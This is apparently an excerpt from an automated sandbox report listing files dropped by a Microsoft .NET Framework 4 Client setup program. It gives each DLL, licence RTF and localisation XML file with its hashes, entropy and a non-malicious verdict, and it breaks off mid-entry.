                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.a.s. .S.e.t.u.p. .k.a.n.n. .n.i.c.h.t. .i.m. .K.o.m.p.a.t.i.b.i.l.i.t...t.s.m.o.d.u.s. .a.u.s.g.e.f...h.r.t. .w.e.r.d.e.n... .W.e.i.t.e.r.e. .I.n.f.o.r.m.a.t.i.o.n.e.n. .f.i.n.d.e.n. .S.i.e. .i.n. .d.e.r. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.I.n.f.o.d.a.t.e.i.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18776
Entropy (8bit):5.135663555520085
Encrypted:false
SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):3419
Entropy (8bit):5.19064562442276
Encrypted:false
SSDEEP:96:MWBfVBITvyTqDyiRc3E5Zob0MpDmqgH4KYXsY/49Uo2:VffWX5Zm0O3Q32
MD5:94190970FB79C7085DE2E97AE4630B07
SHA1:272677F49985098CA0477D6A8C1E70E4BDDB646C
SHA-256:A448FE5954EC68B7C395DA387545C1664C3F4BAADE021E6157EC142997D93CA2
SHA-512:7A7EE485D20912FC533E83EAE0F151DC142C2F01051735D1F9B20A7146154A04C8269FC9F71AC82E57925B566E07E716CDED6DB8B11026225CEAAC209311531F
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (708), with CRLF line terminators
Category:dropped
Size (bytes):86284
Entropy (8bit):4.3740758325121645
Encrypted:false
SSDEEP:384:4w+7UVysuXHXeXAehlT++sTGoheXrW4MgcyvF773/xSFVQbleaS8tOnjiJLtchH0:+3OQeHll5PunjiJr
MD5:3BF8DA35B14FBCC564E03F6342BB71F2
SHA1:8F9139F0BB813BF95F8C437548738D32848D8940
SHA-256:39EFE12C689EDFEA041613B0E4D6EC78AFEC8FE38A0E4ADC656591FFEF8F415D
SHA-512:31B050647BA4BD0C2762D77307E1ED2A324E9B152C06ED496B86EA063CDC18BF2BB1F08D2E9B4AF3429A2BC333D7891338D7535487C83495304A5F78776DBC03
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19288
Entropy (8bit):5.607263971475317
Encrypted:false
SSDEEP:384:jwB6VfhGGglsETXrI7k1tcVlUHe3YRPWTBZWwLXci2jXHUQ:jlpGGKQVlhsSLMi2jXHUQ
MD5:E663B67A66ADF9375D1D183CA5FDD23D
SHA1:30360546A00FFF0A7C2B47F4B01C89E771F13971
SHA-256:574FBDEDCDA1F9F34C997AC3F192CBA72A67D6534B2E9AB80A35AB3543621D58
SHA-512:46E7FFB4889A43059665893ABF1D2B6BF3430A617023FFA91F54AF6D5062444B844D8811ED2D037E756993F733986479E93784AC25C553F70F1CF8D1B67182A3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):8876
Entropy (8bit):4.086204739568071
Encrypted:false
SSDEEP:192:/foOHY6P6Km5NHMQaEjxPSuHON0SuQI62:R46Pm5Ns0jxpeuQV2
MD5:2091F5DA2BF884F747103A31D2DC947B
SHA1:AAD26EB74B793D7DE2F466150F609C276D398FB5
SHA-256:B7A7F2388600D9D059DCDF300845938E429A0FF16EB03BDECE48825805069B7E
SHA-512:AE798ACD11E9A4ADD33DA760B46200E24B9F9403BBBFAF6CB45E25193D346BDE3B91C9B79BB7E10E529DEDD824A89D23212745CF9E9E5EBB44319E9DD812C61D
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (657), with CRLF line terminators
Category:dropped
Size (bytes):77232
Entropy (8bit):3.5669629909438734
Encrypted:false
SSDEEP:384:4w6JjgKW5D8U2JhrDheHQTBNgNSdfUGNatvcc7QDBuGdSJgkR6Sqzxu:gJsKKIrDPT7lSJYI
MD5:326518603D85ACD79A6258886FC85456
SHA1:F1CEF14BC4671A132225D22A1385936AD9505348
SHA-256:665797C7840B86379019E5A46227F888FA1A36A593EA41F9170EF018C337B577
SHA-512:F8A514EFD70E81D0F2F983282D69040BCA6E42F29AA5DF554E6874922A61F112E311AD5D2B719B6CA90012F69965447FB91E8CD4103EFB2453FF160A9062E5D3
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17240
Entropy (8bit):5.151474565875158
Encrypted:false
SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):3188
Entropy (8bit):5.285087573798006
Encrypted:false
SSDEEP:96:MHfTLNnTkWBTkFDZ8f4wHlre7MUxprfKmMb0+MW+1Ep9qeelN+sznM+IEp+Lk2:yfyTLillHW+mMhyAspz2
MD5:B7129C4881F118FCB38F27CFB00CD36D
SHA1:148989B710205C6A67B3F960567F6DAA98D75BDA
SHA-256:DA3D6A6AC223744DF01C920EAE5F43E017F52350831C4F3F6BB38D78232EA3B4
SHA-512:C0816D7676DDF0774EB9022BD305CDCDFEF590BE38E20C2D5584968BCA78E10A14BE375FA892593F11D04BE2734A30B5C1D21814B88C31814C713E08546436E7
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (597), with CRLF line terminators
Category:dropped
Size (bytes):77022
Entropy (8bit):3.5745326569682434
Encrypted:false
SSDEEP:1536:wT42CX8ugmmuM92kEMeeGOCOUJPePJiWGICG+JND:wT42CX8ugmmuM92kEMeeGOCOUJPePJi/
MD5:1AA252256C895B806E4E55F3EA8D5FFB
SHA1:0322EE94C3D5EA26418A2FEA3F7E62EC5D04B81D
SHA-256:8A68B3B6522C30502202ECB8D16AE160856947254461AC845B39451A3F2DB35F
SHA-512:CE57784892C0BE55A00CED0ADC594A534D8A40819790CA483A29B6CD544C7A75AE4E9BDE9B6DC6DE489CECEB7883B7C2EA0E98A38FCC96D511157D61C8AA3E63
Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.166182954405893
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:rJkinUfwVWVRdufl0fXA1Z1j93S0WHpdcIirs442QXWMkeWEQKPnEtObMacxc8hg:rO16Lwz51JWMkeWELXci2jpvi
                                                                                                                                                                  MD5:881ADF55D51976CA592033A7ADF620B8
                                                                                                                                                                  SHA1:E82ED85E25411610D1F977A99368A7A6547C7C47
                                                                                                                                                                  SHA-256:88FCE9BFC0458E375811A7F1EA7CB9777E241D373EEF15D4B23835F77979D54C
                                                                                                                                                                  SHA-512:FED744A6E37F18B6CC3708EEB9F3E874269B1CBDB63B54284470E39E2B01D3DFB61F3626E34638231B9034FA699BDCCD7FE623D8478B205723EF45C1AA595FF9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3702
                                                                                                                                                                  Entropy (8bit):5.238529406475761
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MWBfuMAh8TZhqTy9DbDixX7zR7MrrqX37ILY7TpLgoyk1zERRe5g9KIMpDnYA06m:VfeRzH3vmLQzE6AOAC2
                                                                                                                                                                  MD5:4A43D21D1576E040DC9F5B90162A0401
                                                                                                                                                                  SHA1:1616FA39D9E4E7B2BB927CADED944DD14BD05656
                                                                                                                                                                  SHA-256:F0E2739892A1CE8A6445CEC72FF9AD88E939E21C719552E8ACD746F92F9FAFB7
                                                                                                                                                                  SHA-512:7A7C50B7EC09282A828B06C6A52340C1CAEFF0CFA01FF81375483045972D3645092B5B385103C19ACCADBE5B758DFF85A9DC6FDC00F9AF32AEE076E2C49F79BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (666), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82962
                                                                                                                                                                  Entropy (8bit):3.5891850903091727
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCFpNvOvt1jagJVzRzchryjiTIJz0kbG52bxVv:WvotpaluaIJzaIv
                                                                                                                                                                  MD5:1DAD88FAED661DB34EEF535D36563EE2
                                                                                                                                                                  SHA1:0525B2F97EDDBD26325FDDC561BF8A0CDA3B0497
                                                                                                                                                                  SHA-256:9605468D426BCBBE00165339D84804E5EB2547BFE437D640320B7BFEF0B399B6
                                                                                                                                                                  SHA-512:CCD0BFFBF0538152CCCD4B081C15079716A5FF9AD04CEE8679B7F721441F89EB7C6F8004CFF7E1DDE9188F5201F573000D0C078474EDF124CFA4C619E692D6BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.112489568342605
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                                                                                                                                  MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                                                                                                                                  SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                                                                                                                                  SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                                                                                                                                  SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3526
                                                                                                                                                                  Entropy (8bit):5.107243175407303
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MTBfEhmvTf8vTR/DSIem21HDpHD1cT+Tot4er42xzK8/ptMpDLaFNsNGlDPsCU2:IfJw95eJlx1E+Tot4er42xzKuOKPU2
                                                                                                                                                                  MD5:E0DA85DB8B02A89A63601EA6B9AD7FF8
                                                                                                                                                                  SHA1:5F91C397CF3FBF4475FF71339B2D69C45694130F
                                                                                                                                                                  SHA-256:8880B979A4F8ECDD529241D9AE02583FECD21010EA1E255A1CBCD0C6FB2F75E9
                                                                                                                                                                  SHA-512:C8F47154145507C89D9B599D725C3444A206AE2AFAC2ACA4B2EA18980DEC134A25FC539CE1FB2291AF942DC1CA25EE2FFF323FB17F43F5BF91157A30B19BCD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (599), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72076
                                                                                                                                                                  Entropy (8bit):4.190903034087703
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wkvJlqaYsxaAzdNhXdQGKbvvGu1kZJNvSX33qLv:OHqaBxaeJN7T
                                                                                                                                                                  MD5:16E6416756C1829238EF1814EBF48AD6
                                                                                                                                                                  SHA1:C9236906317B3D806F419B7A98598DD21E27AD64
                                                                                                                                                                  SHA-256:C0EE256567EA26BBD646F019A1D12F3ECED20B992718976514AFA757ADF15DEA
                                                                                                                                                                  SHA-512:AA595ED0B3B1DB280F94B29FA0CB9DB25441A1EF54355ABF760B6B837E8CE8E035537738E666D27DD2A8D295D7517C325A5684E16304887CCB17313CA4290CE6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16728
                                                                                                                                                                  Entropy (8bit):5.741920618836553
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:KADkdHUfwVW13jowXiTeISvjpHawC1wWmeW8QKPnEtObMacxc8hjeyveCX1HQ:K506Qrw5wWmeW8LXci2jpvfw
                                                                                                                                                                  MD5:06CC83E6C677DB13757DF4242F5679F7
                                                                                                                                                                  SHA1:493D44DA1C36A5CEC83B0420BEBC2BF76A9262E8
                                                                                                                                                                  SHA-256:8E3C9332AB38DAD95A4293C466EAB88B17DEE82C87BE047839E85BB816B6146E
                                                                                                                                                                  SHA-512:D4E1694AFE2A35A7A2DB3C8B2A4F83A536DE0AFC5871AE44591317B5B6489B3911F7AEDE8AD9584DCB0BAA8D84B65A20393D587D6F993035FA7DFE13AEAF10CF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1255, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6851
                                                                                                                                                                  Entropy (8bit):4.46966326918659
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:2Rf64JJR1vTJ3R1vTJZZDg1YGZmF1plypIuw75TYgnMJ9nqIQ2fPMpicPtxScRtZ:0fXRskPWIHxYnJVPOxScl9ZnlfZ4LH2
                                                                                                                                                                  MD5:74C015D4E8024F9A49CF8D183CBDB0F5
                                                                                                                                                                  SHA1:8428260A9E522A712EFC8740AF848BD7521DEB8E
                                                                                                                                                                  SHA-256:D7718CF8F97F78656AA8964721757EA7E369FC7BBB052777C90E63D07C7CC7C5
                                                                                                                                                                  SHA-512:BB8748054F194450BC0383D4E88600F00E01BA8FD182C3C3A5A09CFBB0C2FBC30B9CECBAD0B99DDA1EEFA5C3EB56AD50CCACF3FE39302842F16A17082F5F8D04
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (723), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):86442
                                                                                                                                                                  Entropy (8bit):3.674300926924721
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Ji+5JLuNF70SNjPBzuXrXdJHbdi3kC4kL1:Ji+5JLyF70SNjPBzuXrXdJHbdi3kCZZ
                                                                                                                                                                  MD5:89D4356E0F226E75CA71D48690E8EC15
                                                                                                                                                                  SHA1:2336CAA971527977F47512BC74E88CEC3F770C7D
                                                                                                                                                                  SHA-256:FCBB619DEB2D57B791A78954B0342DBB2FEF7DDD711066A0786C8EF669D2B385
                                                                                                                                                                  SHA-512:FA03D55A4AAFE94CBF5C134A65BD809FC86C042BC1B8FFBC9A2A5412EB70A468551C05C44B6CE81F638DF43CCA599AA1DD6F42F2DF3012C8A95A3612DF7C821E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A. .t.e.l.e.p...t.Q. .n.e.m. .f.u.t.t.a.t.h.a.t... .k.o.m.p.a.t.i.b.i.l.i.s. ...z.e.m.m...d.b.a.n... .T.o.v...b.b.i. .i.n.f.o.r.m...c.i... .a. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.o.n.t.o.s. .f...j.l.b.a.n.&.l.t.;./.A.&.g.t.;. .o.l.v.a.s.h.a.t....."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.210200964255437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:mTW68sRjOP2w99bfc/ta4V3mfCHpeEVn3i0MC4wWqyWpLXci2jpv5nNY:m+Aj0R99bfKtHVWfCJeEVn3i0MC44pMQ
                                                                                                                                                                  MD5:C1BF3D63576D619B24837B72986DFAD4
                                                                                                                                                                  SHA1:7392C7B478090831EB2E213BF1224E4F16FDD4D8
                                                                                                                                                                  SHA-256:0995DD70D260673F954DE54FDBA53D55218C536034BE6342E135C7D514073869
                                                                                                                                                                  SHA-512:597F327DF59B0F0CF39FC8753154E55CA8053F489F3FAA5A59C3E7F2115148FE4B49313A94C7CE802AF4B9A1D3FDDF92D3EDC60246E68B17F4CA57CFA3B33397
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......(....@.......................................... ..4+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1038
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                  Entropy (8bit):5.3269919672171735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:k8BfeEfTtXeTjXyZD+dtQRzrGJ6JwtxYMpDNeb6CZXKEp5/Eupwy9Ep+LM2:kgffCXPdOzSJ6JwkOBjC0V2
                                                                                                                                                                  MD5:58E6E6D6258994D6A08C6101F11F302D
                                                                                                                                                                  SHA1:DF2DB9DA70204CBB539D17DF860A6C45613EF086
                                                                                                                                                                  SHA-256:70546BABD12AFAF9FFCC437712DF5491DDF9A6AF8AB4F319FC0EA23AFB186726
                                                                                                                                                                  SHA-512:A4A992E2E44C8594E22849C3ED9019C32CF4085E90CC45F0E45A210E68A574A47BF1A06FA405B1F725E1A4DEFBD27E46FE52F3E7A829C8288EC0208BEAC3238B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1250\deff0\deflang1038\deflangfe1038{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 KIEG\'c9SZ\'cdT\'d5 LICENCFELT\'c9TELEK MICROSOFT SZOFTVERHEZ\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET-KERETRENDSZER 4 MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\f1\par..\f0 MICROSOFT .NET-KERETRENDSZER 4 \'dcGYF\'c9LPROFIL MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\par..\'c9S A KAPCSOL\'d3D\'d3 NYELVI CSOMAGOK\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Ezen kieg\'e9sz\'edt\'e9s licenc\'e9t a Microsoft Corporation (vagy az \'d6n lakhelye alapj\'e1n egy t\'e1rsv\'e1llalata) ny\'fajtja \'d6nnek.\b \b0\'d6n akkor haszn\'e1lhatja ezt a kieg\'e9sz\'edt\'e9st, ha rende
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80060
                                                                                                                                                                  Entropy (8bit):3.556654700353072
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wFACg1fPK/YBZ3tMa9eIzNZNs4fzWmJVo5HnscuRv:/ACgNKjaVLJi2
                                                                                                                                                                  MD5:EDA1EC689D45C7FAA97DA4171B1B7493
                                                                                                                                                                  SHA1:807FE12689C232EBD8364F48744C82CA278EA9E6
                                                                                                                                                                  SHA-256:80FAA30A7592E8278533D3380DCB212E748C190AAEEF62136897E09671059B36
                                                                                                                                                                  SHA-512:8385A5DE4EB6B38169DD1EB03926BC6D4604545801F13D99CEE3ACEDE3D34EC9F9D96B828A23AE6246809DC666E67F77A163979679956297533DA40F9365BF2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.m.p.o.s.s.i.b.i.l.e. .e.s.e.g.u.i.r.e. .i.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .i.n. .m.o.d.a.l.i.t... .d.i. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.e.r. .u.l.t.e.r.i.o.r.i. .i.n.f.o.r.m.a.z.i.o.n.i.,. .v.e.d.e.r.e. .i.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.l.e. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.142702232041524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                                                                                                                                  MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                                                                                                                                  SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                                                                                                                                  SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                                                                                                                                  SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......^.....@.......................................... ...)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1040
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3643
                                                                                                                                                                  Entropy (8bit):5.117983582325958
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rwBfYOP/TfVTJDwXtxjCJEZ+jw/Njppm/F/ZaFgcT/okOct2:yfYXRzMjsA9/EFxDt2
                                                                                                                                                                  MD5:6C9C19BFED724146512493F05CBA4F0F
                                                                                                                                                                  SHA1:DE249075AAC70D4661ED559FD64DE9F33DE43DB5
